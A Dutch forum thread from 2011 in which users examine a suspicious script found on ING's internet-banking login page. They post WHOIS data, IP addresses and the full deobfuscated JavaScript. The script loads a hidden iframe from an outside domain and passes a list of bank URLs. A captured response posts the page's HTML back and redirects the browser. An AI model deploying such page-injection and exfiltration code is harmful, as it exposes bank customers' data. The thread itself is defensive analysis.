Dit inderdaad, ook maar even ww veranderen zometeen...wie weet hoelang dit er al op staat...zou wel een major issue zijn zeg :o .

donderdag 4 augustus 2011 17:25

Acties:
  • 0Henk 'm!

Anoniem: 417641

Het stond er al om 12:00 vanmiddag op.

En vsonicw.com en primebyte.net zijn recentelijk pas geregistreerd, zonder duidelijke eigenaar.

donderdag 4 augustus 2011 17:26

Acties:
  • 0Henk 'm!
  • Robtimus
  • Registratie: November 2002
  • Laatst online: 24-03 15:41

Robtimus

me Robtimus no like you

Wacht dan wel totdat a) ING officieel zegt dat dit as designed is, of b) het opgelost is. Anders blijf je bezig.

More than meets the eye
There is no I in TEAM... but there is ME
Vroeger IceManX | system specs

donderdag 4 augustus 2011 17:26

Acties:
  • 0Henk 'm!
  • Paxlie
  • Registratie: Oktober 2000
  • Laatst online: 24-03 12:43

Paxlie

chaos en inslag

Net een iDeal betaling gedaan, dat wordt voor de zekerheid maar een compleet nieuw secuur wachtwoord en even goed mijn rekening in de gaten houden. Hier wordt je als mens niet vrolijk van.

Wie werd waar wanneer geboren en waarom werd hij door wie hoe genoemd?
braque© zijn is een keuze

donderdag 4 augustus 2011 17:26

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

Puch-Maxi schreef op donderdag 04 augustus 2011 @ 17:22:
Zou dit enige relatie kunnen hebben aan dit?
http://www.theregister.co..._online_banking_concerns/
Nee want daar gaat het over het gebruik van een (bekende?) CDN.

Hier gaat het feitelijk om een script wat op een of andere manier in de pagina gezet is, vanaf een cheapass hosting account in de US en gebruik maakt van een ander domein gehost bij dezelfde partij om daar dingen via HTTPS naartoe te schrijven.

Lijkt mij dat ING geen zaken doet met een of andere cheapass hoster uit Utah iig...
Registrar: FastDomain Inc.
Provider Name....: Netfirms, Inc.
Provider Whois...: whois.fastdomain.com
Provider Homepage: http://www.netfirms.com/

Domain Name: VSONICW.COM

Created on..............: 2011-05-02 14:43:13 GMT
Expires on..............: 2012-05-02 14:43:13 GMT
Last modified on........: 2011-05-04 06:26:26 GMT

Registrant Info: (FAST-12785284)
Fastdomain.com
Fastdomain Inc
1958 South 950 East
Provo, Utah 84606
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email:
Last modified: 2010-12-06 18:57:03 GMT

Administrative Info: (FAST-12785284)
Fastdomain.com
Fastdomain Inc
1958 South 950 East
Provo, Utah 84606
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email:
Last modified: 2010-12-06 18:57:03 GMT

Technical Info: (FAST-12785284)
Fastdomain.com
Fastdomain Inc
1958 South 950 East
Provo, Utah 84606
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email:
Last modified: 2010-12-06 18:57:03 GMT

Status: Active

Domain servers in listed order:

NS1.P30.DYNECT.NET
NS2.P30.DYNECT.NET
en:
Registrar: FastDomain Inc.
Provider Name....: Netfirms, Inc.
Provider Whois...: whois.fastdomain.com
Provider Homepage: http://www.netfirms.com/

Domain Name: PRIMEBYTE.NET

Created on..............: 2011-04-21 11:49:28 GMT
Expires on..............: 2012-04-21 11:49:28 GMT
Last modified on........: 2011-04-21 14:54:07 GMT

Registrant Info: (FAST-12849468)
Fastdomain.com
Fastdomain Inc
1958 South 950 East
Provo, Utah 84606
United States
Phone: +1.8014948462
Fax..: +1.8017651992
Email:
Last modified: 2010-12-06 18:58:24 GMT

Administrative Info: (FAST-12849468)
Fastdomain.com
Fastdomain Inc
1958 South 950 East
Provo, Utah 84606
United States
Phone: +1.8014948462
Fax..: +1.8017651992
Email:
Last modified: 2010-12-06 18:58:24 GMT

Technical Info: (FAST-12849468)
Fastdomain.com
Fastdomain Inc
1958 South 950 East
Provo, Utah 84606
United States
Phone: +1.8014948462
Fax..: +1.8017651992
Email:
Last modified: 2010-12-06 18:58:24 GMT

Status: Active

Domain servers in listed order:

NS1.P30.DYNECT.NET
NS2.P30.DYNECT.NET
Overigens staat er ergens in de scripts een referentie naar asnbank.nl volgens mij. Voor zover ik kan zien is daar (nog) niets aan de hand.

[Voor 74% gewijzigd door mindcrash op 04-08-2011 17:29]

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:26

Acties:
  • 0Henk 'm!
  • JorritJ
  • Registratie: Augustus 2011
  • Laatst online: 09-11-2019

JorritJ

Topicstarter
Ik kwam er vandaag achter nadat een collega iets vreemds voorbij zag komen.
Ik heb helaas vanochtend al ingelogd , dus weet niet of het toen ook ook al op de site stond.

donderdag 4 augustus 2011 17:28

Acties:
  • 0Henk 'm!
  • TheRyzenDude
  • Registratie: Februari 2005
  • Laatst online: 22:33

TheRyzenDude

Is idd erg verdacht...kijk nu net zelf even in de bron.

en zie idd het volgende

Regel 128
script type="text/javascript">(function() {var snippetID = '33271',host = 'www.primebyte.net',sn = document.createElement

Zie in de broncode van Rabo niets van websites terug..*anders opgebouwd veiliger in mijn ogen*

Denk dat er een script injectie op ing is geweest...ik zou zelf nie bankiere op ing.

je leeft maar 1 x maak er dan ook in 1x wat van en maak geen half werk.

donderdag 4 augustus 2011 17:29

Acties:
  • 0Henk 'm!
  • Robtimus
  • Registratie: November 2002
  • Laatst online: 24-03 15:41

Robtimus

me Robtimus no like you

Wat ik wel erg vreemd vind is dat er op de login pagina een stuk JavaScript staat met als enig doel een ander stuk JavaScript te inserten. Waarom is het niet mogelijk direct dat laatste stuk te inserten? Dit maakt het des te verdachter.

More than meets the eye
There is no I in TEAM... but there is ME
Vroeger IceManX | system specs

donderdag 4 augustus 2011 17:29

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

Het javascript laad virtueel een HTML bestand in, en submit die vervolgens weer terug.

Het lijkt alsof het de bedoeling was dat de daadwerkelijke DOM, inclusief ingevuld formulier, zou worden gesubmit, maar dat dit niet werkt.

Ik kan het javascript wel unpacken, maar dat is doorgaans erg tijdrovend en foutgevoelig...

donderdag 4 augustus 2011 17:30

Acties:
  • 0Henk 'm!
  • Cubic X
  • Registratie: Augustus 2006
  • Laatst online: 20:13

Cubic X

Gelukkig heeft ING nog de TAN-codes als extra zekerheid...toch wel kloten dit (als het een hack blijkt te zijn!).

donderdag 4 augustus 2011 17:31

Acties:
  • 0Henk 'm!
  • TD-er
  • Registratie: Januari 2000
  • Laatst online: 22:40

TD-er

Cubic X schreef op donderdag 04 augustus 2011 @ 17:30:
Gelukkig heeft ING nog de TAN-codes als extra zekerheid...toch wel kloten dit (als het een hack blijkt te zijn!).
Die heb je alleen maar nodig voor betalingen.
Voor het koppelen van een paypal account aan je rekening hoef je alleen maar te kunnen inloggen.

Een goedkope voeding is als een lot in de loterij, je maakt kans op een paar tientjes korting, maar meestal betaal je de hoofdprijs. mijn posts (nodig wegens nieuwe layout)

donderdag 4 augustus 2011 17:31

Acties:
  • 0Henk 'm!
  • SuperflipNL
  • Registratie: December 2009
  • Laatst online: 24-03 15:25

SuperflipNL

Op ing.nl is de pagina leeg voor het wijzigen van inloggevens.

BFV: SuperflipNL [PS4]

donderdag 4 augustus 2011 17:33

Acties:
  • 0Henk 'm!

Anoniem: 417641

SuperflipNL schreef op donderdag 04 augustus 2011 @ 17:31:
Op ing.nl is de pagina leeg voor het wijzigen van inloggevens.
Even popupblocker uitzetten. Password wijzigen scherm komt in een popup... GEEN idee waarom.

donderdag 4 augustus 2011 17:33

Acties:
  • 0Henk 'm!
  • TheRyzenDude
  • Registratie: Februari 2005
  • Laatst online: 22:33

TheRyzenDude

Ik zeg dat die site gehacked is...ing kan maar beter even voor de zekerheid de site eruit halen..dan straks vele boze klanten hebben waar vanalles mis is gegaan.....moet zeggen ing is een gewild doelwit volgens mij..

je leeft maar 1 x maak er dan ook in 1x wat van en maak geen half werk.

donderdag 4 augustus 2011 17:34

Acties:
  • 0Henk 'm!
  • b2vjfvj75gjx7
  • Registratie: Maart 2009
  • Niet online

b2vjfvj75gjx7

Dit staat er... als je de code unlocked...

(zie sniffer-screenshot - je verzend / ontvang al data van een externe server, zonder dat je iets doet)

JavaScript: filename
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132

(function () {
    var c = document,
    g = window,
    x = parent;
    var j = g.location.protocol != 'https:' ? 'http:': 'https:',
    y = 'ing_nl',
    k = '33271',
    l = 'v4.0',
    m = 'ak',
    n = true,
    o = '&A=ebc_ebc1961/ebc1961.asp/logonnpbs.co.ukybonline.co.ukonline.bankofamerica.com/cgi-bin/ias/accounts-overview..de/portal/portal/Home.do.hsbc.co.uk/1/2/personal/.halifax-online.co.uk/DisplayMyAccounts:viewMyAccountsnwolb.com/Statementsbanquepopulaire.fr/inversis.comwachovia.comibank.barclays.co.uk/loginTFA.domeine.deutsche-bank.de/trxm/db/itan.authorizationmijn.ing.nl/co-operativebank.co.uk/corp/BANKAWAYgbw.it.chase.com/MyAccountsbcp.ptmy.ebay.co.uk/ws/eBayISAPI.dll?MyEbayManageTAN&R=norisbank.de/.banking.firstdirect.com/1/2/banking.anz.commyspace.com/paypal.secure/arcot.royalbank.com/CapitalOne_Consumer//cmserver/verify.cfmmail.live.com/mailcapitalone.comEBC_EBC1961/EBC1961.ASP/logonbepp/sanpt/usuarios.nwolb.ogin.aspx?rbbva.esbbva.mobi.citizensbankonline.com.indexsampopank./.citibank.com/US/JPS/portal/Home.doasnbank.nl/',
    p = 'www.vsonicw.com',
    q = 's';
    var z = function () {
        return (c.compatMode != 'undefined' && c.compatMode == 'CSS1Compat') ? false: true
    } ();
    function A() {
        return new Date()
    }
    function r() {
        var b = new Date();
        b.setDate(b.getDate() + 365);
        return b.toGMTString()
    };
    function s(b, a) {
        return [b, '=', escape(a), ';', 'expires=', r()].join('')
    };
    function B(b, a) {
        c.cookie = s(b, a)
    };
    function i(b) {
        if (navigator.cookieEnabled == false) {
            return null
        }
        if (c.cookie.length > 0) {
            start = c.cookie.indexOf(b + "=");
            if (start != -1) {
                start = start + b.length + 1;
                end = c.cookie.indexOf(";", start);
                if (end == -1) {
                    end = c.cookie.length
                }
                return unescape(c.cookie.substring(start, end))
            }
        }
        return null
    };
    function C(b) {
        c.cookie = b + "'';expires=Thu, 01-Jan-1970 00:00:01 GMT"
    };
    function D(b) {
        var a = i(b);
        if (!a) {
            return null
        }
        var d = {};
        var f = a.split("|");
        for (var h = 0, t = f.length; h < t; h += 2) {
            d[f[h]] = f[h + 1]
        }
        return d
    };
    function E(b) {
        var a = [];
        for (var d in b) {
            a.push(d, b[d])
        }
        return a.join("|")
    }
    function u(a) {
        if (!g) {
            return
        }
        if (c.readyState == 'complete') {
            a();
            return
        }
        if (typeof(g.addEventListener) != 'undefined') {
            g.addEventListener('load', a, false);
            return
        }
        if (typeof(g.attachEvent) != 'undefined') {
            g.attachEvent('onload', a);
            return
        }
        var d = a;
        if (typeof(g.onload) == 'function') {
            var f = g.onload;
            d = function () {
                var b = a();
                return (f ? f() : b)
            };
            g.onload = d
        }
    };
    function v(b, a) {
        var d = c.createElement(b);
        for (var f in a) {
            d[f] = a[f]
        }
        return d
    };
    function w() {
        try {
            if (!c.createElement || c.getElementById('awa-proxy')) {
                return true
            }
            var b = escape(c.location.protocol + "//" + c.location.host);
            var a = v('iframe', {
                id: 'awa-proxy',
                name: 'awa-proxy'
            });
            a.style.display = 'none';
            var d = typeof(isCompatible) != "undefined" && isCompatible() ? 1 : 0;
            var f = i(m) || "";
            var h = [j, '//', p, , '/', l, '/', k, '/', q, '0', '?em=', b, '&1=', f, '&2=', d, o].join('');
            if (n) {
                a.src = "javascript: false";
                c.body.appendChild(a);
                try {
                    top.frame['awa-proxy'].window.location.replace(h)
                } catch(e) {
                    this.frames['awa-proxy'].window.location.replace(h)
                }
            } else {
                a.src = h;
                c.body.appendChild(a)
            }
        } catch(e) {}
    }
    u(w)
})();

[Voor 3% gewijzigd door b2vjfvj75gjx7 op 04-08-2011 17:41]

donderdag 4 augustus 2011 17:34

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

Ik kan vooralsnog geen enkele aanwijzing vinden dat je logingegevens worden doorgezet naar een ander domein dan dat van ING.

donderdag 4 augustus 2011 17:34

Acties:
  • 0Henk 'm!
  • ThaNOD
  • Registratie: Februari 2005
  • Laatst online: 04-03 21:12

ThaNOD

De code die hier onder staat wordt uiteindelijk uitgevoerd.

het lijkt alsof hij je wil proxy-en.

je log tin op ing via een proxy van waarchijnlijk kwaad willende. die zijn dan feitelijk ingelogd! en kunnen betalingen forceren!

JavaScript:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141

(function () {
    var c = document,
        g = window,
        x = parent;
    var j = g.location.protocol != 'https:' ? 'http:' : 'https:',
        y = 'ing_nl',
        k = '33271',
        l = 'v4.0',
        m = 'ak',
        n = true,
        o = '&A=ebc_ebc1961/ebc1961.asp/logonnpbs.co.ukybonline.co.ukonline.bankofamerica.com/cgi-bin/ias/accounts-overview..de/portal/portal/Home.do.hsbc.co.uk/1/2/personal/.halifax-online.co.uk/DisplayMyAccounts:viewMyAccountsnwolb.com/Statementsbanquepopulaire.fr/inversis.comwachovia.comibank.barclays.co.uk/loginTFA.domeine.deutsche-bank.de/trxm/db/itan.authorizationmijn.ing.nl/co-operativebank.co.uk/corp/BANKAWAYgbw.it.chase.com/MyAccountsbcp.ptmy.ebay.co.uk/ws/eBayISAPI.dll?MyEbayManageTAN&R=norisbank.de/.banking.firstdirect.com/1/2/banking.anz.commyspace.com/paypal.secure/arcot.royalbank.com/CapitalOne_Consumer//cmserver/verify.cfmmail.live.com/mailcapitalone.comEBC_EBC1961/EBC1961.ASP/logonbepp/sanpt/usuarios.nwolb.ogin.aspx?rbbva.esbbva.mobi.citizensbankonline.com.indexsampopank./.citibank.com/US/JPS/portal/Home.doasnbank.nl/',
        p = 'www.vsonicw.com',
        q = 's';
    var z = function () {
            return (c.compatMode != 'undefined' && c.compatMode == 'CSS1Compat') ? false : true
        }();

    function A() {
        return new Date()
    }
    function r() {
        var b = new Date();
        b.setDate(b.getDate() + 365);
        return b.toGMTString()
    };

    function s(b, a) {
        return [b, '=', escape(a), ';', 'expires=', r()].join('')
    };

    function B(b, a) {
        c.cookie = s(b, a)
    };

    function i(b) {
        if (navigator.cookieEnabled == false) {
            return null
        }
        if (c.cookie.length > 0) {
            start = c.cookie.indexOf(b + "=");
            if (start != -1) {
                start = start + b.length + 1;
                end = c.cookie.indexOf(";", start);
                if (end == -1) {
                    end = c.cookie.length
                }
                return unescape(c.cookie.substring(start, end))
            }
        }
        return null
    };

    function C(b) {
        c.cookie = b + "'';expires=Thu, 01-Jan-1970 00:00:01 GMT"
    };

    function D(b) {
        var a = i(b);
        if (!a) {
            return null
        }
        var d = {};
        var f = a.split("|");
        for (var h = 0, t = f.length; h < t; h += 2) {
            d[f[h]] = f[h + 1]
        }
        return d
    };

    function E(b) {
        var a = [];
        for (var d in b) {
            a.push(d, b[d])
        }
        return a.join("|")
    }
    function u(a) {
        if (!g) {
            return
        }
        if (c.readyState == 'complete') {
            a();
            return
        }
        if (typeof (g.addEventListener) != 'undefined') {
            g.addEventListener('load', a, false);
            return
        }
        if (typeof (g.attachEvent) != 'undefined') {
            g.attachEvent('onload', a);
            return
        }
        var d = a;
        if (typeof (g.onload) == 'function') {
            var f = g.onload;
            d = function () {
                var b = a();
                return (f ? f() : b)
            };
            g.onload = d
        }
    };

    function v(b, a) {
        var d = c.createElement(b);
        for (var f in a) {
            d[f] = a[f]
        }
        return d
    };

    function w() {
        try {
            if (!c.createElement || c.getElementById('awa-proxy')) {
                return true
            }
            var b = escape(c.location.protocol + "//" + c.location.host);
            var a = v('iframe', {
                id: 'awa-proxy',
                name: 'awa-proxy'
            });
            a.style.display = 'none';
            var d = typeof (isCompatible) != "undefined" && isCompatible() ? 1 : 0;
            var f = i(m) || "";
            var h = [j, '//', p, , '/', l, '/', k, '/', q, '0', '?em=', b, '&1=', f, '&2=', d, o].join('');
            if (n) {
                a.src = "javascript: false";
                c.body.appendChild(a);
                try {
                    top.frame['awa-proxy'].window.location.replace(h)
                } catch (e) {
                    this.frames['awa-proxy'].window.location.replace(h)
                }
            } else {
                a.src = h;
                c.body.appendChild(a)
            }
        } catch (e) {}
    }
    u(w)
})();

donderdag 4 augustus 2011 17:36

Acties:
  • 0Henk 'm!
  • White_Collar
  • Registratie: Februari 2009
  • Laatst online: 21:15

White_Collar

Helpdesk gebeld, die snappen er niks van.. zucht...

"The reason for time is so that everything doesn't happen at once"

donderdag 4 augustus 2011 17:36

Acties:
  • 0Henk 'm!
  • GlowMouse
  • Registratie: November 2002
  • Niet online

GlowMouse

Gelijk bij bezoeken van https://mijn.ing.nl/internetbankieren/SesamLoginServlet wordt er al een POST gedaan naar https://www.vsonicw.com/v4.0/33271/s1
met deze data:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137

query=A=ebc%5Febc1961%2Febc1961%2Easp%2Flogonnpbs%2Eco%2Eukybonline%2Eco%2Eukonline%2Ebankofamerica%2Ecom%2Fcgi%2Dbin%2Fias%2Faccounts%2Doverview%2E%2Ede%2Fportal%2Fportal%2FHome%2Edo%2Ehsbc%2Eco%2Euk%2F1%2F2%2Fpersonal%2F%2Ehalifax%2Donline%2Eco%2Euk%2FDisplayMyAccounts%3AviewMyAccountsnwolb%2Ecom%2FStatementsbanquepopulaire%2Efr%2Finversis%2Ecomwachovia%2Ecomibank%2Ebarclays%2Eco%2Euk%2FloginTFA%2Edomeine%2Edeutsche%2Dbank%2Ede%2Ftrxm%2Fdb%2Fitan%2Eauthorizationmijn%2Eing%2Enl%2Fco%2Doperativebank%2Eco%2Euk%2Fcorp%2FBANKAWAYgbw%2Eit%2Echase%2Ecom%2FMyAccountsbcp%2Eptmy%2Eebay%2Eco%2Euk%2Fws%2FeBayISAPI%2Edll%3FMyEbayManageTAN&2=0&R=norisbank%2Ede%2F%2Ebanking%2Efirstdirect%2Ecom%2F1%2F2%2Fbanking%2Eanz%2Ecommyspace%2Ecom%2Fpaypal%2Esecure%2Farcot%2Eroyalbank%2Ecom%2FCapitalOne%5FConsumer%2F%2Fcmserver%2Fverify%2Ecfmmail%2Elive%2Ecom%2Fmailcapitalone%2EcomEBC%5FEBC1961%2FEBC1961%2EASP%2Flogonbepp%2Fsanpt%2Fusuarios%2Enwolb%2Eogin%2Easpx%3Frbbva%2Eesbbva%2Emobi%2Ecitizensbankonline%2Ecom%2Eindexsampopank%2E%2F%2Ecitibank%2Ecom%2FUS%2FJPS%2Fportal%2FHome%2Edoasnbank%2Enl%2F&1=&em=https%3A%2F%2Fmijn%2Eing%2Enl&app=v4&ak=&cm=0&html=
<!-- comment -->



<!-- Welcome,  </body> -->
<!-- <!DOCTYPE <html > </html>  -->
<!-- </body> </html> -->
<!-- </BODY> </HTML> -->
<!-- 
</BODY>
     </HTML> -->
<!-- 
</HTML>
-->
<!-- </table> <div> -->
<!-- <title> at a glance banking</title> <meta > -->
<!-- </title> <script> -->
<!-- <script> </HEAD> Account Balances -->
<!-- <input TYPE="text" style="font:11px arial" tabindex="1" >  -->
<!-- alt="Password" maxlength="20"></div>*</div>  -->
<!-- <script language="JavaScript" type="text/javascript" src="sas-docs/js/verifyImage.js"> </script>  -->
<!-- name="password_tmp" </TR>  -->
<!--  </body> -->
<!-- NAME="Passwd" </tr>  -->
<!-- if(focusElement != null) { } -->
<!-- < "loginMessageTD" ">  -->
<!-- <input name="multiID" id="multiID" type="textbox" class="search-text-box" > -->
<!-- SUCURSALAUX.style.display*<body link="#CC0001" vlink="#CC0001" alink="#CC3300">  -->
<!-- function submitLogin(){  } -->
<!-- /CodeLibrary/Includes/functions/Client/Security/pm_fp.js  -->
<!-- <input class="boton" type="submit" name="Signon">  -->
<!-- atdmt  -->
<!-- <h2 >Startseite</h2>  -->
<!-- <link rel="stylesheet" dif="x">  -->
<!-- </html>  -->
<!-- <input name="btnContinue" type="submit" class="PageButton" value="Continue" onMouseOver="window.status=''; return true" onMouseOut="window.status=''; return true" alt="Continue"  -->
<!-- <input type="text" name="userid" id="userid" autocomplete="off" value="" tabindex="4" /> <label for="rememberuid" id="rememberuidlabel"> </label> -->
<!-- name="codAbi" </tr>  -->
<!-- <head>  -->
<!-- <h2 >Finanzstatus</h2>  -->
<!--  if (rememberme_prefill != "" -->
<!-- <input type="password" style="font-family: Arial, Helvetica; font-size: 10pt; color:#000066; background-color: #e8e8e8;" size="12" maxlength="12" name="passwd" value=>  -->
<!-- <body  -->
<!-- <div id="marketing"> </section></div> -->
<!-- <table summary="This table shows the current balance of all your accounts"  -->
<!-- <script language="javascript" type="text/javascript">  -->
<!-- <head >  -->
<!--  </head> -->
<!-- var theForm;  -->
<!-- <table </tr> </table> -->
<!-- <body>  -->
<!-- To combat the threat of internet fraud and hacki*<script type="text/javascript"> </script> -->
<!-- id="IBloginForm" -->
<!-- </head>  -->
<!-- <table class="security" cellpadding="0" cellspacing="0"> </body> -->
<!-- </body>  -->
<!-- < summary="layout"> <td class="spacerH20"> <tr valign="top >  -->
<!-- <input type="submit" name="_buttonNext" value="Next" > -->
<!-- <body >  -->
<!-- type="text" name="login" >  -->
<!-- <form method="post" name="formLogin" <table class="tabela1_login" border="0" cellspacing="0" > <table> </table> </form> -->
<!-- https://www.bice.cl/bice/servlet/bice/template/bice AC_AvisoPop  -->
<!-- <input type="password" name="passcode" id="passcode" > -->
<!-- function doEncryption() document -->
<!-- <input id="top-button" name="olb_signin" class="button" type="submit" title="Sign In to Online Banking" value="Sign In" onClick="cmCreateManualLinkClickTag('https://sitekey.bankofamerica.com/sas/signon.do', 'homepage_sign_in', 'homepage:Content;home_personal'); javascript:doPassmarkSignIn(); return false;"  -->
<!-- > Check() > </body> </html> -->
<!-- <input type="hidden" name="sitekeySignon" value="">  -->
<!-- Where do I enter my Passcode? signInFunction = " " -->
<!-- <div class="LoginColumn2"><input class="LoginAnswer" type="password" name="password" id="password" value="" size="20" AUTOCOMPLETE="off" alt="Password" maxlength="20"></div>  -->
<!-- <HEAD >  -->
<!-- size=17 maxlength=16 autocomplete="off"></td> <td valign="middle">&nbsp;</td> -->
<!-- function noFramesCheck() { } -->
<!-- </title>  -->
<!-- apportiti</title> </body> -->
<!-- <INPUT type="text" name='userid' <a   title="Log on"  -->
<!-- <div class="hsbcMainContent hsbcCol" -->
<!-- <input TYPE="text" style="font:11px arial" tabindex="1" -->
<!-- <div class="btnInput btn_type1"> <div> -->
<!-- </body> <body id="portalLogin"> -->
<!-- <form name="login_form" > -->
<!-- <h1>Welcome!</h1> -->
<!-- <div id="start_div"></div> -->
<!-- </html> -->
<!-- <HEAD> webtrends_top_section.js </script> </script> </HEAD> Account details -->
<!-- SessionID: </body> -->
<!-- <table class="InboxTable" </table> -->
<!-- <form method="post" action="LoginMember.do" > -->
<!-- "alerta"  -->
<!-- style="background-color:white; color: #444444;"/>&nbsp;  -->
<!-- function SubmitMe(FormName) { }  -->
<!-- <FORM Name="Form1" id="Form1" ACTION="javascript:SubmitMe()" METHOD="post">  -->
<!-- id="transpFullDiv"  -->
<!-- if (p) return true;  -->
<!-- <input type="hidden" name="__VIEWSTATE" </div> -->
<!-- e clique em Entrar  -->
<!-- <script>footer();</script> -->
<!-- <form NAME="frmStatement" METHOD="POST" ACTION="Statement.asp"> -->
<!-- <div id="fdMastheadDiv" class="fdMasthead"> -->
<!-- function doPassmarkSignIn() { -->
<!-- </BODY> -->
<!-- </head><body > -->
<!-- onsubmit=" < > -->
<!-- onload="populateHiddenField();" < >  -->
<!-- onsubmit=" < -->
<!-- <div class="body" > -->
<!-- <div class="alert"><table id="t_a1"> -->
<!-- <div id="LI5PFG" > -->
<!-- <form class="faqForm" method="get" action="" target="_blank"> -->
<!-- name="hidden_name_input_ANSWER" id="idInputPassPhrase"> -->
<!-- if (window.doEncryption) { doEncryption();  -->
<!-- <table class="supported"> -->
<!-- < src="../images/NICE_icopie3_bp.gif" alt="icono3" /> -->
<!-- <form id="fLogout" > -->




<script>
function getHTTPObject() { if (typeof XMLHttpRequest != 'undefined') { return new XMLHttpRequest(); } try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } return false; }

try {
  var h = getHTTPObject();
  h.open("POST", "./s1", true);
  params = ["query=A%3Debc%255Febc1961%252Febc1961%252Easp%252Flogonnpbs%252Eco%252Eukybonline%252Eco%252Eukonline%252Ebankofamerica%252Ecom%252Fcgi%252Dbin%252Fias%252Faccounts%252Doverview%252E%252Ede%252Fportal%252Fportal%252FHome%252Edo%252Ehsbc%252Eco%252Euk%252F1%252F2%252Fpersonal%252F%252Ehalifax%252Donline%252Eco%252Euk%252FDisplayMyAccounts%253AviewMyAccountsnwolb%252Ecom%252FStatementsbanquepopulaire%252Efr%252Finversis%252Ecomwachovia%252Ecomibank%252Ebarclays%252Eco%252Euk%252FloginTFA%252Edomeine%252Edeutsche%252Dbank%252Ede%252Ftrxm%252Fdb%252Fitan%252Eauthorizationmijn%252Eing%252Enl%252Fco%252Doperativebank%252Eco%252Euk%252Fcorp%252FBANKAWAYgbw%252Eit%252Echase%252Ecom%252FMyAccountsbcp%252Eptmy%252Eebay%252Eco%252Euk%252Fws%252FeBayISAPI%252Edll%253FMyEbayManageTAN%262%3D0%26R%3Dnorisbank%252Ede%252F%252Ebanking%252Efirstdirect%252Ecom%252F1%252F2%252Fbanking%252Eanz%252Ecommyspace%252Ecom%252Fpaypal%252Esecure%252Farcot%252Eroyalbank%252Ecom%252FCapitalOne%255FConsumer%252F%252Fcmserver%252Fverify%252Ecfmmail%252Elive%252Ecom%252Fmailcapitalone%252EcomEBC%255FEBC1961%252FEBC1961%252EASP%252Flogonbepp%252Fsanpt%252Fusuarios%252Enwolb%252Eogin%252Easpx%253Frbbva%252Eesbbva%252Emobi%252Ecitizensbankonline%252Ecom%252Eindexsampopank%252E%252F%252Ecitibank%252Ecom%252FUS%252FJPS%252Fportal%252FHome%252Edoasnbank%252Enl%252F%261%3D%26em%3Dhttps%253A%252F%252Fmijn%252Eing%252Enl","app=v4","ak=","cm=0","html=" escape(document.body.innerHTML)].join("&");

  h.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  h.onreadystatechange = function() {  
                                if(h.readyState == 4 && h.status == 200) {
                                    var t = h.responseText;
                  if (t && t.length>0) { document.location.replace(t); }
                }
    }
  h.send(params);
} catch (e) {
}
</script>

Wanneer je op inloggen drukt,

donderdag 4 augustus 2011 17:36

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

Ik zou op dit moment niet m'n wachtwoord wijzigen daar. Dit is meer dan een simpele XSS aanval, denk dat de hackers fysiek op de servers zijn geweest. God mag weten wat ze nog meer hebben aangepast (wellicht blijft het bij het toevoegen van wat JavaScript, maar ze kunnen net zo goed serverside ook nog bezig zijn geweest enzo).

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:36

Acties:
  • 0Henk 'm!
  • Cloud
  • Registratie: November 2001
  • Laatst online: 24-03 09:23

Cloud

FP ProMod

Ex-moderatie mobster

Die beide domeinnamen primebyte.net en vsonicw.com zijn overigens door dezelfde partij geregistreerd. Beide domeinen resolven naar ip's die minimaal verschillen:

code:
1
2

www.primebyte.net - 178.79.159.123
www.vsonic.com    - 178.79.159.121


En of ze nu daadwerkelijk gehacked zijn of niet, dit is wel een flater van vanjewelste met zulke obscure praktijken in de loginpagina voor je internet bankieren :X

Never attribute to malice that which can be adequately explained by stupidity. - Robert J. Hanlon
60% of the time, it works all the time. - Brian Fantana

donderdag 4 augustus 2011 17:37

Acties:
  • 0Henk 'm!
  • GlowMouse
  • Registratie: November 2002
  • Niet online

GlowMouse

Cloud schreef op donderdag 04 augustus 2011 @ 17:36:
Die beide domeinnamen primebyte.net en vsonicw.com zijn overigens door dezelfde partij geregistreerd. Beide domeinen resolven naar ip's die minimaal verschillen:

code:
1
2

www.primebyte.net - 178.79.159.123
www.vsonic.com    - 178.79.159.121


